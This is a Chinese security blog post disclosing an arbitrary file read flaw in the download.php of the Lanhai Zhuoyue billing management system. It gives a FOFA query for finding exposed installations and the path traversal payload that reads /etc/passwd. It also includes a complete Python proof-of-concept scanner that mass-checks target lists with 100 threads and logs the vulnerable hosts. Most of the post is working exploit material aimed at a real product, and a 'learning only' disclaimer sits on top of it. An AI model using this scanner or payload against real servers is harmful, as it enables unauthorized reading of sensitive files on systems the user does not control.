蓝海卓越计费管理系统任意文件读取漏洞

本文涉及的产品
云原生网关 MSE Higress,422元/月
函数计算FC,每月15万CU 3个月
可观测监控 Prometheus 版,每月50GB免费额度
简介: 蓝海卓越计费管理系统 download.php文件存在任意文件读取漏洞,攻击者通过 …/遍历目录可以读取到服务器上的敏感文件。

声明


请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。


一、漏洞描述


  蓝海卓越计费管理系统 download.php文件存在任意文件读取漏洞,攻击者通过 …/遍历目录可以读取到服务器上的敏感文件。


二、漏洞复现


漏洞关键字搜索

FOFA:title =="蓝海卓越计费管理系统"image.png

漏洞位置:download.php?file=../../../../../etc/passwd

image.png

脚本检测

# -*- coding: utf-8 -*-

import argparse

import sys

import requests

from multiprocessing.dummy import Pool  # 表示的是多线程

requests.packages.urllib3.disable_warnings()

def banner():

   test = """

 

█████╗ ███╗   ██╗██╗   ██╗    ███████╗██╗██╗     ███████╗    ██████╗ ███████╗ █████╗ ██████╗  

██╔══██╗████╗  ██║╚██╗ ██╔╝    ██╔════╝██║██║     ██╔════╝    ██╔══██╗██╔════╝██╔══██╗██╔══██╗

███████║██╔██╗ ██║ ╚████╔╝     █████╗  ██║██║     █████╗      ██████╔╝█████╗  ███████║██║  ██║

██╔══██║██║╚██╗██║  ╚██╔╝      ██╔══╝  ██║██║     ██╔══╝      ██╔══██╗██╔══╝  ██╔══██║██║  ██║

██║  ██║██║ ╚████║   ██║       ██║     ██║███████╗███████╗    ██║  ██║███████╗██║  ██║██████╔╝

╚═╝  ╚═╝╚═╝  ╚═══╝   ╚═╝       ╚═╝     ╚═╝╚══════╝╚══════╝    ╚═╝  ╚═╝╚══════╝╚═╝  ╚═╝╚═════╝  

                                                                                           

                                                       tag:  An any file read poc

                                                       @version: 1.0.0

                                                       @author:  Nian-stars

   """

   print(test)

headers = {

   "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) "

                 "Safari/537.36",

}

def poc(target):

   url = target + "/download.php?file=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd" # 利用%2e来代替"."完成目录穿越

   try:

       res = requests.get(url, headers=headers, verify=False, timeout=5).text

       if "root" in res:

           print(f"[+] {target} is vulnerable!")

           with open("result.txt", "a+", encoding="utf-8") as f:

               f.write(target + "\n")

       else:

           print(f"[+] {target} is not vulnerable!")

   except:

       pass

def main():

   banner()

   parser = argparse.ArgumentParser(description='An any file read poc')

   parser.add_argument("-u", "--url", dest="url", type=str, help=" example: http://www.example.com")

   parser.add_argument("-f", "--file", dest="file", type=str, help=" urls.txt")

   args = parser.parse_args()

   if args.url and not args.file:

       poc(args.url)

   elif not args.url and args.file:

       url_list = []

       with open(args.file, "r", encoding="utf-8") as f:

           for url in f.readlines():

               url_list.append(url.strip().replace("\n", ""))

       mp = Pool(100)  # 表示的是线程数为100

       mp.map(poc, url_list)

       mp.close()

       mp.join()

   else:

       print(f"Usage:\n\t python3 {sys.argv[0]} -h")

if __name__ == '__main__':

   main()

image.png

目录
相关文章
|
安全 数据安全/隐私保护
蓝凌OA系统存在任意文件读取(SSRF)
蓝凌OA系统存在任意文件读取(SSRF)
蓝凌OA系统存在任意文件读取(SSRF)
|
1月前
|
安全 关系型数据库 MySQL
Web安全-任意文件下载漏洞
Web安全-任意文件下载漏洞
67 5
|
5月前
|
安全 网络安全
明御安全网关任意文件上传漏洞
安恒信息明御安全网关(以下简称“NGFW”)秉持安全可视、简单有效的理念,以资产为视角,构建“事前+事中+事后”全流程防御的下一代安全防护体系,并融合传统防火墙、入侵防御系统、防病毒网关、上网行为管控、VPN网关、威胁情报等安全模块于一体的智慧化安全网关。
213 1
|
安全 Shell PHP
渗透攻击实例-文件上传导致任意代码执行
渗透攻击实例-文件上传导致任意代码执行
|
Shell
自动统计出差费用-shell 脚本自动统计
计算车费,餐补,住宿补。并且转换金额大写
101 0
|
安全 Java 应用服务中间件
从任意文件读取到拿webshell
从任意文件读取到拿webshell
|
安全 Shell Linux
锐捷某系统前台任意文件写入分析
锐捷某系统前台任意文件写入分析
242 0
|
XML 存储 安全
XXE 漏洞任意文件读取
XXE 漏洞任意文件读取
555 0
|
安全 数据可视化
Grafana 未授权任意文件读取漏洞
Grafana 未授权任意文件读取漏洞
1268 0
Grafana 未授权任意文件读取漏洞
|
安全
CVE-2020-8209 XenMobile 控制台存在任意文件读取漏洞
XenMobile提供了一种可靠的移动设备管理解决方案,可以对企业设备和员工个人设备进行基于角色的管理、配置和支持并确保安全性。与只能提供基本设备管理软件的大多数厂商不同,XenMobile可提供多种高级功能和特性来确保移动应用可随时用于业务目的并确保移动内容安全性,如区域防护(geo-fencing)、自动化合规性及一键式实时聊天和支持等。
95 0
CVE-2020-8209 XenMobile 控制台存在任意文件读取漏洞